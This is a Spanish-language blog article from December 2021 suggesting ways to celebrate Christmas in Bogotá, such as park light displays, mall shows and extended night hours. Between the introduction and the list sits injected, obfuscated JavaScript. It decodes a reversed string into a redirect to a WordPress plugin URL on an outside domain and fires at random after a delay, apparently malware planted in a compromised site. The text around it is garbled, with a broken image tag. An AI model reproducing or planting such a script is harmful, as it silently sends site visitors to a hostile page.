Skip to main content

Planes para celebrar Navidad en Bogotá 2021

By diciembre 16, 2021diciembre 21st, 2021Artículos, Cultura Bogota
Navidad en Bogotá

Una de las festividades más esperada por los colombianos es la Navidad, época de unión, de fiesta, de agradecimiento, de amor, paz y esperanza; así como también, es una característica es el aumento de compras, especialmente de ropa, regalos y alimentos. Así que, si buscas planes para celebrar las últimas festividades del año 2021 en Bogotá, llegaste a donde era.

Pero antes, te traemos algunos de los símbolos tradicionales de la Navidad alrededor del mundo son: el árbol de Navidad, el cual hace referencia al árbol del Paraíso y sus hojas son símbolo de vida eterna; Papa Noel, este personaje vestido de rojo es el encargado de entregar los juguetes a los niños; el pesebre y la corona navideña.

Sin embargo, luego de la primera Navidad en época de Covid-19, nos enfrentamos a la cancelación de decenas de planes de temporada a los que estábamos acostumbrados, pero por fortuna, para este 2021 las actividades intentan volver a la “nueva normalidad”, por eso, te contamos algunos de los planes para celebrar Navidad en Bogotá este 2021.

$NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}to.-alcaldia-mayor.jpg» alt=»Navidad en Bogotá» width=»1050″ height=»590″ /> Fuente: https://bogota.gov.co/

  • Iluminación navideña: Bogotá cuenta con más de 20 puntos de alumbrado que podrás visitar con tus amigos y familia, entre esos: Parque Ilimaní, Parque Villa Mayor, Plazoleta Super Cade Suba, Parque Santander, Plazoleta Fundacional de Usaquén, Techo, Ciudad Jardín, Mirador Paraíso, La Alquería, Parque San Andrés, Parque la Valvanera, Plaza la Concordia, Parque Alcalá, Voto Nacional y Bronx, Carrera 7 entre calle 11 y calle 26, Parque San Cristóbal Sur, Parque El Tunal, Parque Carlos Lleras, Parque Molinos II, Parque de Los Novios, Parque Timiza, Separados calle 53 entre carreras 60 y 50, Parque Ciudad Montes.
  • Navidad en Centros Comerciales: Diferentes shows se robarán el espectáculo el 24 de diciembre, celebrando junto a sus visitantes esta festividad.
  • Bogotá Despierta: Entre este 16 y 23 de diciembre la ciudad funcionará hasta altas horas de la noche, encontrarás transporte, Centros Comerciales abiertos y reactivación económica.

Encontrarás también rutas gastronómicas, eventos culturales en diferentes puntos de la ciudad, ferias comerciales en varias localidades y más, cuyos horarios están pendientes de confirmación.

Autor: Angélica Maldonado

Deja un comentario